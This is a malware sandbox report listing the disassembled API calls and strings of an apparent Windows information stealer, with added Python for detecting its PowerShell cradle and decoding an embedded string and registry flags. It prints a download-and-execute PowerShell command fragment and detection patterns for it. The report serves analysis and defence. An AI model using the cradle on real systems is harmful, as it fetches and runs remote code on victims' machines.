                                    • Instruction Fuzzy Hash: DDB12072A10118ABDF04FBA0DD96EEE737CBF55300F504169F506A6092EF346A49DBE2
                                    APIs
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                    • Instruction ID: 298eba823dc7ca74481b7f2477490ca3f7f7a69f9112d580d867fda11bd53a47
                                    • Opcode Fuzzy Hash: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                    • Instruction Fuzzy Hash: C8F03A3090820DEFD7449FE0BD1DB6CFB70FB0470AF040199E60986290D6764A419B96
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00084FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00084FD1
                                    • InternetOpenA.WININET(000A0DDF,00000000,00000000,00000000,00000000), ref: 00084FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00085011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00085041
                                    • InternetCloseHandle.WININET(?), ref: 000850B9
                                    • InternetCloseHandle.WININET(?), ref: 000850C6
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: a46f9da14256259c293d7fe62ead09acbc7a8c52b320793a489af32475b95322
                                    • Instruction ID: fd424e37543ea0513a47bf13754611a08872d5eb00bf0a3224bfabc0ff6addeb
                                    • Opcode Fuzzy Hash: a46f9da14256259c293d7fe62ead09acbc7a8c52b320793a489af32475b95322
                                    • Instruction Fuzzy Hash: 3331F7B4A0021CABDB20DF54DC89BDDB7B4FB48709F5081D9EA09A7281D7706AC58F99
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                    • wsprintfA.USER32 ref: 00098459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,00D3F278,00000000,000F003F,?,00000400), ref: 000984EC
                                    • lstrlen.KERNEL32(?), ref: 00098501
                                    • RegQueryValueExA.ADVAPI32(00000000,00D3F248,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000A0B34), ref: 00098599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00098608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0009861A
                                    Strings
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                    • Instruction ID: d3e448c92bd64a8e7e9d4c4ccc6f03eae0e4b502a71defd288c1f88b4382608d
                                    • Opcode Fuzzy Hash: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                    • Instruction Fuzzy Hash: 8E21EB7191021C9BDB64DB54DC85FE9B3B8FB48704F00C5D8E649A6240DF716A85CFD4
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000976A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000976AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00D2BDF0,00000000,00020119,00000000), ref: 000976DD
                                    • RegQueryValueExA.ADVAPI32(00000000,00D3F098,00000000,00000000,?,000000FF), ref: 000976FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00097708
                                    Strings
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                    • Instruction ID: a8e3920d274236e3eca6559199eee7c483683ec8489c8f47ee94ed1a0f88450a
                                    • Opcode Fuzzy Hash: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                    • Instruction Fuzzy Hash: 38016DB5A0420CBBEB00DBE4EC4DFAEB7B8EB48709F104194FA08D7291E6749904DB51
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0009773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00D2BDF0,00000000,00020119,000976B9), ref: 0009775B
                                    • RegQueryValueExA.ADVAPI32(000976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0009777A
                                    • RegCloseKey.ADVAPI32(000976B9), ref: 00097784
                                    Strings
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                    • Instruction ID: 586df8aa2f1317cbda031f23b287618f71223e806fe60605c437993ef6cc1bb5
                                    • Opcode Fuzzy Hash: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                    • Instruction Fuzzy Hash: 440112B5A4030CBBEB00DBE4EC4EFAEB7B8FB48705F104559FA05A7291DA705A04CB52
                                    APIs
                                    • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00093AEE,?), ref: 000992FC
                                    • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00099319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00099327
                                    Strings
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: :$:
                                    • API String ID: 1378416451-2052217321
                                    • Opcode ID: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                    • Instruction ID: 7b95bd8a590ced5df0d69f5119013ad1a842c8fe76755c33039d69fb99ab2d02
                                    • Opcode Fuzzy Hash: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                    • Instruction Fuzzy Hash: C2F03C75E44208FBDF20DFB4EC49F9EB7B9AB48710F10C258B651A72D0D67097019B50
                                    APIs
                                    • memset.MSVCRT ref: 000940D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,00D3E0A8,00000000,00020119,?), ref: 000940F4
                                    • RegQueryValueExA.ADVAPI32(?,00D3F338,00000000,00000000,00000000,000000FF), ref: 00094118
                                    • RegCloseKey.ADVAPI32(?), ref: 00094122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094147
                                    • lstrcat.KERNEL32(?,00D3F2D8), ref: 0009415B
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                    • Instruction ID: 50b276cea78cf827573cde4a01559659fc521300c690b37dc4eeecf2a91f2029
                                    • Opcode Fuzzy Hash: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                    • Instruction Fuzzy Hash: 59418AB6D0010CABDB14FBA0FC4AFED777DBB48304F004558B61996182EA755B888B92
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                    • LocalFree.KERNEL32(0008148F), ref: 00089A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                    • Instruction ID: d6f8461af0857a3cfb945ad84c8623d296412c710e55632014b62b6fe7b80baa
                                    • Opcode Fuzzy Hash: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                    • Instruction Fuzzy Hash: DE310AB4A00209EFDB14EF94D989FAE7BF9FF48344F148158E911A7290D774A941CFA2
                                    Similarity
                                    • API ID: String___crt$Typememset
                                    • String ID:
                                    • API String ID: 3530896902-3916222277
                                    • Opcode ID: 8cd6b8920d645c0be719cc48e6c599a651c24bac3bb86ad66f1d0481ced5bcf0
                                    • Instruction ID: 7639910bb3b47c39c337c607ca3f340db3ede076de2c685ea2ddc6111f0d7c59
                                    • Opcode Fuzzy Hash: 8cd6b8920d645c0be719cc48e6c599a651c24bac3bb86ad66f1d0481ced5bcf0
                                    • Instruction Fuzzy Hash: 8341D97190079C5EEF318B24CD99FFBBBE89F45704F1444E8E9CA96182D2719A44EF60
                                    APIs
                                    • lstrcat.KERNEL32(?,00D3F398), ref: 000947DB
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094801
                                    • lstrcat.KERNEL32(?,?), ref: 00094820
                                    • lstrcat.KERNEL32(?,?), ref: 00094834
                                    • lstrcat.KERNEL32(?,00D2A770), ref: 00094847
                                    • lstrcat.KERNEL32(?,?), ref: 0009485B
                                    • lstrcat.KERNEL32(?,00D3E348), ref: 0009486F
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                      • Part of subcall function 00094570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                      • Part of subcall function 00094570: RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                      • Part of subcall function 00094570: wsprintfA.USER32 ref: 000945A6
                                      • Part of subcall function 00094570: FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                    • Instruction ID: 2c2c3e7f4f97976ef5e1db9254bd49d0c12b57e50ca7298ecc3f9f865f988a97
                                    • Opcode Fuzzy Hash: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                    • Instruction Fuzzy Hash: A7317FB290021CA7CF10FBB0DC8AEE9737CAB48704F444589F35996082EE749789DB96
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00092D85
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00092D04
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00092CC4
                                    • <, xrefs: 00092D39
                                    • ')", xrefs: 00092CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
                                    • Instruction ID: e89be59b5f21d0b84a00419fc10e3f9c6de35ff6afc83d4243486df7b854e1e0
                                    • Opcode Fuzzy Hash: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
                                    • Instruction Fuzzy Hash: 1B41DD71E102189ADF14EBA0D896BEEB774AF15300F404119E116AA192DF746A4AEFD2
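The function above concatenates the path `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` with the fragments `-nop -c "iex(New-Object Net.WebClient).DownloadString('` and `')"` around a URL and hands the result to ShellExecuteEx, which is the download-and-execute primitive the "Yara detected Powershell download and execute" signature refers to. What follows is an added example written for this report, not code from the sample or from Joe Sandbox: a small detector run over constructed process-creation records in Sysmon Event ID 1 / Security 4688 style. The URL in the records is a placeholder, because the report does not show the real one, and the parent/image paths are invented for the sake of the records.

```python
"""Detect the PowerShell download-and-execute command line that the function
above assembles, in process-creation telemetry.

Added example for this report; not code from the sample or from Joe Sandbox.
The records below are constructed (Sysmon Event ID 1 / Security 4688 style)
and the URL in them is a placeholder, since the report does not show it."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed records: (parent image, image, command line).
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    # Shape of what the function above produces (placeholder URL).
    (r"C:\Users\user\Desktop\file.exe",
     r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -c \"iex(New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/stage2.ps1')\""),
    # Benign admin script run from a file: no download, no iex.
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    # Same primitive with mixed case and a hidden window.
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -NoP -W Hidden -C \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/a')\""),
    # Fetch without evaluation (e.g. a version check): context only, not flagged.
    (r"C:\Program Files\App\svc.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -c \"(New-Object Net.WebClient)"
     ".DownloadString('https://example.invalid/ver.txt')\""),
]

# Evaluation of a string as code (iex is the alias of Invoke-Expression).
_EVAL = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
# Remote fetch primitives: WebClient methods and the cmdlets/aliases.
_FETCH = re.compile(r"(?i)\.download(?:string|data|file)\s*\("
                    r"|\b(?:invoke-webrequest|iwr|invoke-restmethod|irm)\b")
# -nop / -NoP / -NoProfile (PowerShell accepts unambiguous prefixes).
_NOPROFILE = re.compile(r"(?i)(?:^|\s)-nop[a-z]*\b")
_HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden\b")
_URL = re.compile(r"(?i)https?://[^\s'\")]+")


@dataclass
class Finding:
    parent: str
    image: str
    url: Optional[str]
    indicators: Tuple[str, ...]


def is_powershell(image: str) -> bool:
    """True for powershell.exe / pwsh.exe regardless of directory or case."""
    name = image.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    return name in {"powershell.exe", "pwsh.exe"}


def classify(parent: str, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when the command line both fetches remote content and
    evaluates it; a fetch on its own is not enough to call it download-and-execute."""
    if not is_powershell(image):
        return None
    indicators = []
    if _EVAL.search(cmdline):
        indicators.append("iex")
    if _FETCH.search(cmdline):
        indicators.append("download")
    if _NOPROFILE.search(cmdline):
        indicators.append("noprofile")
    if _HIDDEN.search(cmdline):
        indicators.append("hidden")
    if "\\syswow64\\" in image.lower():
        # A 32-bit host launching the 32-bit PowerShell, as the sample does.
        indicators.append("wow64")
    if "iex" not in indicators or "download" not in indicators:
        return None
    url = _URL.search(cmdline)
    return Finding(parent, image, url.group(0) if url else None, tuple(indicators))


def scan(events: List[Tuple[str, str, str]]) -> List[Finding]:
    return [f for f in (classify(*e) for e in events) if f is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit.parent} -> {hit.image}: {hit.url} {hit.indicators}")
```

The rule deliberately requires both a fetch and an evaluation indicator; the fourth constructed record, which only downloads a string, is left for correlation rather than alerted on. The parent image (`file.exe` in the first record) is kept in the finding because an unexpected parent is what distinguishes this from an administrator typing the same one-liner.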
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00089F41
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: e9e40540ea179c612c51948f8260904798044c82c536c2eb57bd1719136b1e14
                                    • Instruction ID: 9dc016bd1b12d5dcd1b7036f8e83dd8c51074860d0ed995ff6a559d29aaee753
                                    • Opcode Fuzzy Hash: e9e40540ea179c612c51948f8260904798044c82c536c2eb57bd1719136b1e14
                                    • Instruction Fuzzy Hash: 01612D70A10248DBDF24EFA4CC96BEE77B5BF45300F008118F94A5F592EB746A06CB92
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • memset.MSVCRT ref: 0009716A
                                    Strings
                                    • s, xrefs: 000972AE, 00097179, 0009717C
                                    • s, xrefs: 00097111
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0009718C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpymemset
                                    • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 4047604823-1849715570
                                    • Opcode ID: 9f8627165bde6d4daf0fbb3c8e3d492cd6c6b4651d7c59300f858c3822904c88
                                    • Instruction ID: 355bffb72020971e78e8d699b133527c13a7f442d42e15ecea2f9a95d3078023
                                    • Opcode Fuzzy Hash: 9f8627165bde6d4daf0fbb3c8e3d492cd6c6b4651d7c59300f858c3822904c88
                                    • Instruction Fuzzy Hash: B35181B1D142189BDF64EBA4DC45BEEB3B4AF44304F2040A8E21976182EF746E88DF55
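The long string referenced at 0009718C is a space-separated list of hex byte values. Read as ASCII it is the 43-character base64 text `eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0`, which has no `=` padding and decodes to the JSON `{ "typ": "JWT", "alg": "EdDSA" }`, i.e. a JWT header. The report does not state what the function does with it, and nothing is assumed here about that. The following decoder is an added example for this report, not code from the sample or from Joe Sandbox; it takes the string exactly as printed above and handles the missing padding.

```python
"""Decode the hex-encoded string at 0009718C: hex bytes -> base64 text -> JSON.

Added example for this report; not code from the sample or from Joe Sandbox.
HEX_STRING is copied from the Strings entry above."""
import base64
import json
import re
from typing import Any, Tuple

HEX_STRING = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 "
              "4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")

_HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")


def hex_words_to_bytes(text: str) -> bytes:
    """Parse 'XX XX XX' into bytes, rejecting anything that is not a hex byte."""
    words = text.split()
    bad = [w for w in words if not _HEX_BYTE.fullmatch(w)]
    if bad:
        raise ValueError(f"not hex bytes: {bad[:3]}")
    return bytes(int(w, 16) for w in words)


def b64decode_unpadded(text: str) -> bytes:
    """Strict base64 decode that tolerates stripped '=' padding (as here).

    A length of 1 mod 4 can never be valid base64, so it is rejected before
    padding is restored; the alphabet is validated by b64decode itself."""
    text = text.strip()
    if len(text) % 4 == 1:
        raise ValueError("invalid base64 length")
    return base64.b64decode(text + "=" * (-len(text) % 4), validate=True)


def decode_embedded_string(hex_text: str) -> Tuple[str, bytes, Any]:
    """Return (base64 text, decoded bytes, parsed JSON) for a hex-encoded string."""
    b64 = hex_words_to_bytes(hex_text).decode("ascii")
    raw = b64decode_unpadded(b64)
    return b64, raw, json.loads(raw)


if __name__ == "__main__":
    b64, raw, obj = decode_embedded_string(HEX_STRING)
    print(b64)
    print(raw.decode())
    print(obj)
```

The two-stage encoding (hex of base64) is why the plain base64 text does not appear in the report's string list; searching dumps for the decoded form `eyAidHlw` or for `"alg": "EdDSA"` is the quicker way to find other copies.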
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,00D2B8E8,00000000,00020119,?), ref: 00097E5E
                                    • RegQueryValueExA.ADVAPI32(?,00D3E0E8,00000000,00000000,000000FF,000000FF), ref: 00097E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00097E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                    • Instruction ID: 6e78d685c8d12dbf8b987746416c7380a92a9b90525219f497b146144c52b597
                                    • Opcode Fuzzy Hash: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                    • Instruction Fuzzy Hash: 28115EB2A44209EBDB14CF95ED49FBFBBB8FB48B14F104259F605A7280D77458009BA2
                                    APIs
                                    • StrStrA.SHLWAPI(00D3F008,?,?,?,0009140C,?,00D3F008,00000000), ref: 0009926C
                                    • lstrcpyn.KERNEL32(002CAB88,00D3F008,00D3F008,?,0009140C,?,00D3F008), ref: 00099290
                                    • lstrlen.KERNEL32(?,?,0009140C,?,00D3F008), ref: 000992A7
                                    • wsprintfA.USER32 ref: 000992C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                    • Instruction ID: df86f365501934db64641b33b05ace10a5ce835e9c9abfd6e55ed643a7c372f6
                                    • Opcode Fuzzy Hash: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                    • Instruction Fuzzy Hash: 3501937550010CFFCB04DFECD988EAE7BB9EF58358F148248F9099B244C635AA509B91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                    • RegCloseKey.ADVAPI32(?), ref: 000812FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                    • Instruction ID: 7d006b3fc34906dcd3f97ed2a761d8170b98febb221998c3d0b58e799149703c
                                    • Opcode Fuzzy Hash: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                    • Instruction Fuzzy Hash: 1B01CDB9A4020CBBDB14DFE4EC4DFAEB7B8FB48705F108159FA0597280DA759A058B51
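The two registry-reading functions above (at 00097E37 and 000812B4) share one shape: a 0x104-byte (MAX_PATH) heap buffer, then RegOpenKeyExA with access mask 0x20119, RegQueryValueExA, RegCloseKey. The first call opens under 0x80000002 (HKEY_LOCAL_MACHINE); in the second the hive argument is an unresolved runtime value. 0x20119 is KEY_READ (0x20019) with KEY_WOW64_64KEY (0x100) added, so the sample asks for the native 64-bit registry view rather than the redirected Wow6432Node one. That it is a 32-bit process is an inference from the 32-bit addresses throughout the report and the SysWOW64 PowerShell path, not something the report states. The decoder below is an added example written for this report, not code from the sample or from Joe Sandbox; the constants are the documented Win32 values, and which key and value name are read is not shown in the report and is not assumed.

```python
"""Decode RegOpenKeyExA arguments as listed for the two registry functions above.

Added example for this report; not code from the sample or from Joe Sandbox.
Constants are the documented winreg.h / winnt.h values. The key path and value
name the sample reads are not in the report and are not assumed here."""
from typing import Dict, List

HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Individual REGSAM bits.
REGSAM_BITS = {
    0x00000001: "KEY_QUERY_VALUE",
    0x00000002: "KEY_SET_VALUE",
    0x00000004: "KEY_CREATE_SUB_KEY",
    0x00000008: "KEY_ENUMERATE_SUB_KEYS",
    0x00000010: "KEY_NOTIFY",
    0x00000020: "KEY_CREATE_LINK",
    0x00000100: "KEY_WOW64_64KEY",
    0x00000200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F
WOW64_VIEW_BITS = 0x300
MAX_PATH = 260


def decode_regsam(sam: int) -> List[str]:
    """Split an access mask into named bits; leftover bits are reported, not dropped."""
    names, rest = [], sam
    for bit, name in sorted(REGSAM_BITS.items()):
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"UNKNOWN(0x{rest:x})")
    return names


def composite_rights(sam: int) -> str:
    """Name the standard composite (KEY_READ etc.) once the WOW64 view bits are removed."""
    base = sam & ~WOW64_VIEW_BITS
    return {KEY_ALL_ACCESS: "KEY_ALL_ACCESS", KEY_WRITE: "KEY_WRITE",
            KEY_READ: "KEY_READ"}.get(base, f"0x{base:x}")


def describe_open(hive: int, sam: int, buf_size: int,
                  caller_is_wow64: bool) -> Dict[str, object]:
    """Summarise one RegOpenKeyEx call as an analyst would read it.

    caller_is_wow64 is supplied by the caller: for this sample it is an
    inference from the report (32-bit addresses, SysWOW64 PowerShell path)."""
    if sam & 0x100:
        view = "64-bit"
    elif sam & 0x200:
        view = "32-bit"
    else:
        view = "default"
    return {
        "hive": HIVES.get(hive, f"unresolved(0x{hive:x})"),
        "rights": decode_regsam(sam),
        "composite": composite_rights(sam),
        "view": view,
        "buffer_bytes": buf_size,
        "buffer_is_max_path": buf_size == MAX_PATH,
        # A 32-bit process asking for the 64-bit view reads the native hive,
        # not the Wow6432Node copy it would otherwise be redirected to.
        "bypasses_wow64_redirection": caller_is_wow64 and view == "64-bit",
    }


if __name__ == "__main__":
    # The two call sites from the report: hive, REGSAM, heap buffer size.
    for hive, sam, size in ((0x80000002, 0x20119, 0x104), (0xFF, 0x20119, 0x104)):
        print(describe_open(hive, sam, size, caller_is_wow64=True))
```

The practical consequence for a sandbox or a detection rule is that any HKLM value this code reads will be the one a 64-bit process would see; a check that only stages decoy values under Wow6432Node will not be reached by this sample.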
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00096663
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
